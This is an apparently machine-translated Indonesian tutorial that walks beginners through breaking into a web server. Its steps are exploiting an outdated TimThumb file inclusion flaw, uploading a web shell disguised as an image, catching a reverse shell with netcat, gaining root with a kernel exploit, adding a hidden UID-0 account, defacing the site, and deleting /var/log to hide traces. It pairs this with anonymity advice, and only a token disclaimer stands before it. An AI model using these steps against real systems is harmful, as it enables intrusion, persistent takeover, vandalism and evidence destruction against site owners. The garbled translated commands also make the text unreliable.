Cerita Web-Hacking
Oleh
chmood
Hei Teman - Teman :) ,
Ada beberapa tutorial ketika datang ke web hacking yang ... tapi di suatu tempat di semua pengetahuan ini, hacking web server akan hilang! Jadi mari kita pergi satu ini ... Tutorial ini ditujukan untuk mengotori, rooting dan menciptakan kehadiran terus-menerus pada server, untuk pemula ...Web-Hacking adalah topik besar yang saya bisa dengan mudah mendiskusikan selama berjam-jam.
Hari ini saya memutuskan untuk membuat awal yang baik dengan menciptakan ini pasca-tutorial: Cara Hack Server ... Segala sesuatu yang Anda perlu tahu.
DISCLAIMER: apa pun yang ANDA BELAJAR DI SINI HARUS DIGUNAKAN UNTUK KEPERLUAN PUTIH HAT HANYA
Alat yang Anda butuhkan:
- Backtrack (www.backtrack-linux.org) OR Kali Linux (https://www.kali.org/)
- Firefox (www.mozilla.org/en-US/firefox/new/) Termasuk dalam Backtrack dan Ubuntu
- Netcat (Termasuk di Backtrack) Jika Anda berada di lingkungan linux lainnya mendapatkannya dari nmap.org/ncat/.
- ICon2PHP (gnahackteam.wordpress.com/gnahackteam/icon2php/)
- Sebuah shell yang baik (iCon2PHP Arsip mencakup tiga kerang besar)
- Sebuah VPN baik atau Tor (Lebih penjelasan di bawah ini ..)
- Acunentix Web Vulnerability Scanner (versi trial juga tersedia)
Tentang Alat:
Backtrack / Kali
Sebuah distribusi Linux berbasis Ubuntu / Debian. Ini mencakup semua yang anda butuhkan untuk menjadi seorang hacker yang baik. Terlepas dari ini, hacker di balik sistem Linux lebih baik dari satu Windows sejak paling Website pada Server Linux.
Firefox
Firefox adalah browser terbaik untuk hacking. Anda dapat dengan mudah mengkonfigurasi proxy dan Anda dapat men-download jutaan add-ons di antara yang Anda dapat menemukan beberapa untuk Hacking. Temukan lebih lanjut tentang addons Hacky untuk Firefox atau Anda bisa mendapatkan koleksi saya dari sini.
Netcat - netcat adalah alat jaringan yang kuat. Anda akan membutuhkan ini untuk membasmi server
iCon2PHP & Shells Baik - Anda akan menggunakannya jika Anda meng-upload gambar untuk sebuah Image Uploader di Forum atau Gambar Layanan Hosting. iCon2PHP Arsip berisi beberapa kerang atas tersedia
VPN baik atau TOR (Proxy juga bagus) - Sementara hacker yang Anda butuhkan untuk menjadi anonim agar tidak menemukan Anda (bahkan jika Anda lupa untuk menghapus log.). Sebuah VPN adalah singkatan dari Virtual Private Network dan apa yang dilakukannya adalah: menyembunyikan IP Anda, mengenkripsi data Anda mengirim dan menerima ke dan dari Internet. Sebuah solusi VPN baik untuk Windows maschines adalah ProXPN. Namun, dengan koneksi VPN (terutama ketika Anda berada di bawah koneksi VPN gratis) kecepatan koneksi Anda benar-benar lambat. Jadi, saya tidak akan merekomendasikan VPN kecuali Anda membayar dan mendapatkan account dibayar.
Apa yang saya sarankan adalah Tor. Tor dapat digunakan dari bundel nya: Vidalia, yang merupakan alat yang hebat untuk Windows, Mac dan Linux yang menggunakan Proxy seluruh jaringan di seluruh dunia sehingga tetap Anda anonim dan mengubah Proxy ini setiap 5-10 menit. Saya percaya itu adalah salah satu solusi terbaik untuk menjaga Anda anonim jika Anda tidak ingin membayar untuk account VPN Dibayar
Terlepas dari Tor, Proxy sederhana yang baik tetapi saya tidak akan merekomendasikan mereka sebanyak yang saya lakukan, Tor.
Jika saya tercantum pilihan di atas sesuai dengan kehandalan mereka:
1. Dibayar Akun VPN di ProXPN
2. Tor
Akun 3. Free VPN di ProXPN
4. Koneksi Proxy
Acunetix Web Vulnerability Scanner - Scan untuk port terbuka, kerentanan web, daftar direktori. Selama pemindaian itu daftar kerentanan dan mengatakan bagaimana seorang hacker bisa memanfaatkan itu dan bagaimana patch itu. Hal ini juga menunjukkan tingkat keparahan kerentanan.
Konsultan Edition (Untuk website tidak terbatas) biaya sekitar 3000-7000 $.
Mulai Utama Tutorial:
Jadi, di sini adalah rute kami akan mengikuti:
Cari Website Rentan> Upload c100 Shell (Tersembunyi dalam Gambar dengan iCon2PHP)> Rooting Server> defacing Website> Menutupi Trek Anda
- Sebelum kita mulai -
-Boot ke Kali atau Backtrack
-Hubungkan Ke VPN atau untuk Tor
-Buka Firefox
1. Menemukan Website Rentan dan Informasi tentang hal ini:
Acunetix - Buka dan memindai situs (menggunakan profil standar, tidak mengubah apa-apa kecuali jika Anda tahu apa yang Anda lakukan). Untuk tutorial ini website kami akan: www.site.com
Katakanlah kita menemukan kerentanan menggunakan yang bisa kita upload file jarak jauh (shell kami) dan memiliki akses ke file website
Peringatan tersebut harus sesuatu seperti ini. Hal ini dapat menyebutkan informasi lain atau menjadi benar-benar lain peringatan (seperti untuk SQL Injection Saya akan posting Tutorial ini juga), juga! (Tergantung pada Kerentanan tersebut) Apa yang kita butuhkan pada tutorial ini adalah bahwa kita dapat memanfaatkan File Inclusion Attack dan Memiliki akses ke File Website ini. (Ini bukan peringatan yang kita butuhkan untuk tutorial ini, tetapi terkait dengan apa yang kita lakukan juga.)
OKE. Sekarang, kita memiliki situs dan jalan yang kerentanan tersebut. Dalam contoh kita katakanlah itu adalah di sini:
www.site.com/blog/wp-content/themes/theme_name/thumb.php
Kerentanan di atas mempengaruhi blog WordPress yang telah diinstal plugin atau tema tertentu dan belum diperbarui ke versi terbaru dari Timthumb, yang merupakan layanan editing gambar di website.
OKE. Acunetix juga harus menyebutkan OS dari Server. Dengan asumsi bahwa kita adalah sistem Unix / Linux (sehingga untuk menunjukkan cara untuk membasmi itu).
Untuk saat ini, kami tidak memiliki apa pun untuk melakukan dengan Acunetix
2. Meng-upload shell:
Sampai sekarang, kita tahu:
blog -The situs memiliki kerentanan besar di Timthumb
-itu-Host pada Sistem Unix
Selanjutnya, karena fakta bahwa Kerentanan ini terletak di versi Timthumb usang, dan tim praktis adalah layanan untuk mengedit gambar, kita perlu meng-upload shell bukan gambar
Dengan demikian, men-download gambar apapun (saya akan merekomendasikan yang kecil) dari Google Images. Kami tidak peduli apa itu menunjukkan.
Menghasilkan output dengan iCon2PHP
Menyalin gambar Anda dan Shell Anda ke Folder yang iCon2PHP terletak
Jalankan Program dan ikuti dalam program-petunjuk untuk membangun finalImage.php
Untuk menghindari kesalahan saat meng-upload mengubah nama finalImage.php untuk image.php; .png (bukan png, ketik format gambar gambar Anda telah jpeg, jpg, gif, bmp, png dll) ini adalah persis file yang sama tetapi membingungkan pengunggah dan berpikir bahwa itu benar-benar adalah gambar.
Masukkan Jalan Gambar Anda: image.png
Masukkan path ke PHP: GnYshell.php
Masuk!
Hari File!
[...]
File: finalImage.php telah berhasil dibuat di direktori sekarang
Upload Keluaran ke Server:
Berikutnya, upload image.php Anda; .png ke server gratis. (000webhost, 0Fees dll)
Pergi ke kerentanan dan jenis di URL:
www.site.com/blog/wp-content/themes/theme_name/thumb.php?src=http: / ...
Akan lebih baik untuk membuat subdomain seperti flickr.com (atau layanan image hosting besar lainnya) karena kadang-kadang tidak menerima gambar dari situs-situs lain.
Situs web. Dikupas!
OKE. website Anda adalah dikupas. Ini berarti bahwa Anda harus sekarang shell Anda upload dan siap untuk root server.
Anda bisa dengan mudah deface website sekarang tapi akan lebih baik jika Anda pertama kali berakar server, sehingga untuk menutupi trek Anda dengan cepat.
3. Root Server sehingga menjadi persisten:
Sekarang bahwa Anda telah dikupas situs Anda, kami dapat memulai proses untuk root server
Apa yang rooting ketika datang untuk Server Hacking?
Rooting server adalah prosedur ketika hacker memperoleh akses root di seluruh server. Jika Anda tidak memahami hal ini belum, saya meyakinkan Anda bahwa pada akhir bagian Rooting server Anda akan memahami apa itu
Mari kita lanjutkan ke perakaran
Terhubung melalui netcat:
1. Buka port di router Anda. Untuk tutorial ini saya akan menggunakan 402. (Pencarian Google tentang cara port forward. Hal ini lebih mudah daripada tampaknya)
2. Terminal Terbuka
3. Jenis:
netcat
4. Sekarang ketik:
l -n -v -p 402
5.It harus memiliki output seperti ini:
mendengarkan pada [apapun] pelabuhan 402
6. Sekarang, pergi ke fungsi Back-Connection di Shell
7. Lengkap dengan:
Tuan rumah: YouIPAddress Pelabuhan: 402 (atau port Anda diteruskan)
8. Hit menghubungkan dan Voila! Terhubung ke server!
Download dan Pelaksana Kernel mengeksploitasi:
1. Sekarang, jika Anda mengetik:
Siapakah aku
Anda akan melihat bahwa Anda bukan root belum
2. Untuk melakukannya kita harus men-download kernel mengeksploitasi. Versi kernel disebutkan di shell Anda. Cari eksploitasi kernel sini
3. Ambil ke HDD Anda dan kemudian meng-upload ke server melalui Shell. Unzip pertama, jika zip.
4. Sekarang lakukan persiapan berikut mengeksploitasi:
Jenis yang paling biasa eksploitasi:
+++ Perl (.pl ekstensi)
+++ C (ekstensi c)
((Jika program ini di C Anda harus terlebih dahulu melakukan kompilasi dengan mengetikkan: exploit.c gcc -o exploit))
Mengubah hak akses dari mengeksploitasi:
chmod 777 mengeksploitasi
5. Jalankan mengeksploitasi. Mengetik:
./mengeksploitasi
6. izin Akar diperoleh! Ketik ini untuk memastikan:
id
atau
Siapakah aku
7. Tambahkan user root baru:
adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
mana root1 adalah nama pengguna yang diinginkan
8. Ubah password dari user root baru:
root1 passwd
BERHASIL berakar!
4. Deface Website:
Apa yang mengotori?
Defacing adalah prosedur ketika hacker upload halaman web inbox sendiri untuk mengubah homepage dari sebuah situs. Dengan cara ini, ia bisa meningkatkan reputasinya atau mengurai pesan kepada orang-orang atau perusahaan (yang memiliki website)
Karena Anda punya website dikupas, Anda hanya membuat halaman Hacky bagus di html dan meng-upload melalui Shell sebagai inbox.html (Menghapus atau mengubah nama website satu)
5. Tutup trek Anda:
Sampai sekarang Anda berada di bawah anonimitas Tor atau ProXPN. Kau sangat aman. Namun, dalam rangka untuk memastikan bahwa tidak mungkin untuk admin untuk menemukan Anda kami harus menghapus log.
Pertama-tama, mesin berbasis Unix memiliki beberapa log yang Anda memiliki lebih baik mengedit atau menghapus.
Umum Linux file log nama dan penggunaannya:
/ Var / log / message: pesan Umum dan sistem yang terkait hal-hal
/var/log/auth.log: log Authentication
/var/log/kern.log: log Kernel
/var/log/cron.log: log crond (cron job)
/ Var / log / maillog: Mail server log
/ Var / log / qmail /: Qmail direktori log (lebih file di dalam direktori ini)
/ Var / log / httpd /: Apache direktori akses dan error log
/ Var / log / lighttpd: akses Lighttpd dan error log direktori
/var/log/boot.log: log boot System
/var/log/mysqld.log: database MySQL server log file
/ Var / log / aman: Authentication log
/ Var / log / utmp atau / var / log / wtmp: catatan Login berkas
/var/log/yum.log: Yum file log
Singkatnya / var / log adalah lokasi di mana Anda harus menemukan semua Linux log file yang
Untuk menghapus semua dari mereka dengan sekali jenis:
su root1
rm-rf / var / log
mkdir / var / log
Itu saja! Ini adalah metode yang digunakan oleh sebagian besar topi hitam ketika mereka ingin deface server dan mendapatkan akses gigih untuk itu.
Semoga ini membantu
WTHack
Bisakah kita hack Anda sebelum hacker lakukan? -_-
Category
Komentar